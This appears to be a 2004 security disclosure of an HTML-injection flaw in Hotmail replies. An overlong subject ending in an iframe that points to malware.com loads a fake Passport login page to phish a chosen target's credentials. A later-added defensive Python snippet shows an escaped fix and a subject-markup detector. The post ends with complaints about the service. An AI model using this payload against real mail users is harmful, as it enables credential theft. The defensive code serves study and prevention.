
HOTMAIL / PASSPORT: phishing expedition




Thursday, March 18, 2004

Unbelievably ridiculous insertion of arbitrary HTML into the 
Hotmail web-based email account of your targeted "buddy".

In order to gain your "little pal's" credentials, simply send 
him or her an email with an extra-long subject like so:

heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddy<iframe src="http://www.malware.com/pithy.html">

Where our iframe points to window.open along with our trojanised 
Passport re-sign-in page. When your "chum" replies to your 
email, our iframe is rendered out of sight in the message body 
of the email and up goes our error window requesting him to 
log in again. Only this time he'll be sending you his credentials.
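As an added defensive illustration (not code from the original post, nor Hotmail's or Passport's own code), the injection point described above beside its fix: a reply composer that drops the original subject into the HTML body verbatim versus one that HTML-escapes header values, plus a gateway-style check that flags inbound subjects carrying active-content tags. The sample subject and the URL in it are constructed placeholders.

```python
import html
import re

# Constructed sample in the shape the post describes: padding followed by a
# tag at the tail of the subject. The URL is a placeholder, not a real host.
INJECTED_SUBJECT = "heylittlebuddy" * 20 + '<iframe src="http://example.invalid/placeholder.html">'


def reply_body_unsafe(original_subject: str, quoted_text: str) -> str:
    """The failure mode: the original subject is concatenated into the HTML
    reply body unescaped, so any markup it carries is rendered by the client."""
    return (f"<div>----- Original Message -----<br>"
            f"Subject: {original_subject}<br>{quoted_text}</div>")


def reply_body_safe(original_subject: str, quoted_text: str) -> str:
    """Hardened version: header values are untrusted text, so every one of
    them is HTML-escaped before it is placed inside the reply's markup."""
    return (f"<div>----- Original Message -----<br>"
            f"Subject: {html.escape(original_subject)}<br>"
            f"{html.escape(quoted_text)}</div>")


# Tags that have no legitimate reason to appear inside a Subject header.
_MARKUP_RE = re.compile(r"<\s*/?\s*(iframe|script|object|embed|img|form|meta|link)\b", re.I)


def subject_has_markup(subject: str) -> bool:
    """Detection rule for a mail gateway or log pipeline: flag subjects that
    carry active-content tags, independent of whether the UI escapes them."""
    return _MARKUP_RE.search(subject) is not None


def contains_live_tag(rendered_html: str) -> bool:
    """True if an iframe survives as real markup rather than as &lt;iframe text."""
    return re.search(r"<iframe\b", rendered_html, re.I) is not None


if __name__ == "__main__":
    print("unsafe body renders the tag:", contains_live_tag(reply_body_unsafe(INJECTED_SUBJECT, "hi")))
    print("safe body renders the tag:  ", contains_live_tag(reply_body_safe(INJECTED_SUBJECT, "hi")))
    print("subject flagged by gateway: ", subject_has_markup(INJECTED_SUBJECT))
```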

Notes:

1. This is too pathetic for words. Cursory checking of all 
settings in Hotmail 'reply to' suggests there is no deactivation 
of HTML email when composing a reply.
2. Consideration was given to informing the owner of this 
particular web-based mail service of this particular issue; 
however, we have not used such a poor service in recent years. So 
much so that one can only suspect that such a slovenly operation is 
intentional, in order to force account users to upgrade to the 
pay service:

a) As of three hours from time of writing we are still awaiting 
receipt of emails into the Hotmail account from eight [that's 
numeral 8] different mail servers. Internal mail messages are 
instant, but three hours for external is completely unacceptable.
b) Constant 'server is busy' errors. What does 40 billion 
dollars buy you today? More acreage around your acreage for more 
privacy.
c) Initiation and re-activation of a dormant account of the free 
webmail account from the owner of this particular web-based mail 
service requires a magnifying glass to see. If you don't have 
one, you're liable to select the pay-for service as it appears 
there are no other choices.
d) Use Yahoo Mail. Instant receipt of emails from any mail 
server all the time. Replying to HTML email filters tags in the subject.

End Call

-- 
http://www.malware.com